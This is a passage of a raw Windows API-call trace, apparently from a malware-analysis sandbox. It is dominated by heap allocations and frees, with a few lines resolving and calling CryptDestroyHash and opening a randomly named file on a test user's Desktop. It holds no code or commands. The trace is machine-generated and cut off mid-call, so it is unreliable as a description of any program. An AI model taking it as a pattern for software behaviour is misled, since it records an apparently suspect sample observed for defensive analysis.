0x2e78b28 [0148.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0148.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0148.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0148.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0148.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0148.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0148.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b30 [0148.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50bf0 [0148.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0148.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a70 [0148.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a40 [0148.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0148.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0148.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0148.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0148.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0148.825] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0148.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0148.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0148.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a88 [0148.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0148.825] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0148.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0148.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0148.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0148.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0148.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0148.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0148.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0148.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0148.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0148.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0148.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0148.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0148.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0148.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0148.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0148.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0148.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0148.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0148.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0148.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0148.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0148.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0148.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0148.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0148.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0148.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0148.826] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0148.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0148.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0148.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0148.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0148.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0148.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0148.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0148.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0148.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0148.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0148.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0148.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0148.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0148.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0148.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0148.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0148.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0148.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0148.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0148.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0148.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0148.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69b08 [0148.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69b08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0148.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0148.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0148.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0148.827] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0148.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0148.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0148.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0148.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0148.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0148.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0148.828] CryptDestroyHash (hHash=0xa87090) returned 1 [0148.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0148.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0148.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0148.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0148.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0148.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0148.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0148.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0148.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0148.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0148.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0148.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0148.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0148.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0148.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0148.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0148.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0148.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0148.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0148.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0148.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0148.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0148.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0148.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0148.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0148.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0148.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0148.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0148.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0148.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0148.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0148.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0148.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0148.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0148.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0148.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0148.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0148.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0148.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0148.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0148.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0148.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0148.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0148.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0148.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0148.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0148.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0148.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0148.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0148.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0148.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0148.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0148.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0148.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0148.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0148.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0148.830] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0148.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0148.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0148.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0148.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0148.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0148.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0148.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0148.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0148.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0148.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0148.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0148.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0148.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0148.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0148.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0148.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0148.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0148.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0148.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0148.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0148.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0148.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0148.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0148.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0148.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0148.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0148.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0148.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0148.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0148.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0148.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0148.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0148.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0148.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0148.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0148.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0148.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0148.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0148.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0148.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0148.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0148.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0148.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0148.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0148.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0148.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0148.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0148.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0148.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0148.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0148.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0148.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0148.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0148.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0148.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0148.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0148.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0148.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0148.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0148.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0148.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0148.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0148.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0148.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0148.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0148.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0148.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0148.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0148.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0148.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0148.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0148.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0148.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0148.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0148.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0148.833] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0148.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0148.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0148.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0148.833] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0148.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0148.833] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0148.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0148.834] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0148.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0148.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0148.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0148.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0148.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0148.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0148.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0148.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0148.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0148.835] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/ElwQwY9lqgU4Me-0 5E.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\elwqwy9lqgu4me-0 5e.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0148.836] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, 